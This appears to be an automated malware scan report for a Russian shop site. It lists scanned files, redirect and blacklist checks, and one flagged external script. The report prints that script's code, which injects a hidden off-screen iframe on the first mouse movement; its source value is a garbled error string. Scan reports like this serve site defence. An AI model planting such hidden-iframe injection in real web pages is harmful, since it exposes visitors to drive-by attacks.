Scanned pages/files
Request | Server response | Status |
http://4asiki.ru/ | 200 OK Content-Length: 8759 Content-Type: text/html | clean |
http://4asiki.ru/catalog/view/javascript/jquery/jquery-1.7.1.min.js | 200 OK Content-Length: 93868 Content-Type: application/javascript | clean |
http://4asiki.ru/catalog/view/javascript/jquery/ui/jquery-ui-1.8.16.custom.min.js | 200 OK Content-Length: 210463 Content-Type: application/javascript | clean |
http://4asiki.ru/catalog/view/javascript/jquery/ui/external/jquery.cookie.js | 200 OK Content-Length: 3655 Content-Type: application/javascript | clean |
http://4asiki.ru/catalog/view/javascript/jquery/colorbox/jquery.colorbox.js | 200 OK Content-Length: 26926 Content-Type: application/javascript | clean |
http://4asiki.ru/catalog/view/javascript/jquery/tabs.js | 200 OK Content-Length: 450 Content-Type: application/javascript | clean |
http://4asiki.ru/catalog/view/javascript/common.js | 200 OK Content-Length: 4878 Content-Type: application/javascript | clean |
http://changeip.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) res='ÐÑибка MySQL'; var astatf = 0; document.write("<head></head><b><div id='staticaccoin'></div></b>"); document.onmousemove=moveonlinetest; function moveonlinetest() { if (astatf == 0) { astatf++; text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>"; document.getElementById("staticaccoin").innerHTML = text }} Antivirus reports:
| ||
http://4asiki.ru/function.unlink | 200 OK Content-Length: 8399 Content-Type: text/html | clean |
http://4asiki.ru/index.php?route=account/login | 200 OK Content-Length: 8399 Content-Type: text/html | clean |
http://4asiki.ru/index.php?route=account/catalog/view/javascript/jquery/jquery-1.7.1.min.js | 200 OK Content-Length: 8399 Content-Type: text/html | clean |
http://4asiki.ru/index.php?route=account/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.7.1.min.js | 200 OK Content-Length: 8399 Content-Type: text/html | clean |
http://4asiki.ru/index.php?route=account/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.7.1.min.js | 200 OK Content-Length: 8399 Content-Type: text/html | clean |
http://4asiki.ru/index.php?route=account/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.7.1.min.js | 200 OK Content-Length: 8399 Content-Type: text/html | clean |
http://4asiki.ru/index.php?route=account/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.7.1.min.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 4asiki.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 12 Aug 2014 11:17:30 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=f3c8588b0a8f04840732efd71bf6f08f; path=/
Set-Cookie: language=ru; expires=Thu, 11-Sep-2014 11:17:28 GMT; path=/; domain=4asiki.ru
Set-Cookie: currency=RUB; expires=Thu, 11-Sep-2014 11:17:28 GMT; path=/; domain=4asiki.ru
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: 4asiki.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 12 Aug 2014 11:17:30 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=f3c8588b0a8f04840732efd71bf6f08f; path=/
Set-Cookie: language=ru; expires=Thu, 11-Sep-2014 11:17:28 GMT; path=/; domain=4asiki.ru
Set-Cookie: currency=RUB; expires=Thu, 11-Sep-2014 11:17:28 GMT; path=/; domain=4asiki.ru
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: 4asiki.ru
Referer: http://www.google.com/search?q=4asiki.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 4asiki.ru
Referer: http://www.google.com/search?q=4asiki.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=4asiki.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://4asiki.ru/
Result: 4asiki.ru is not infected or malware details are not published yet.
Result: 4asiki.ru is not infected or malware details are not published yet.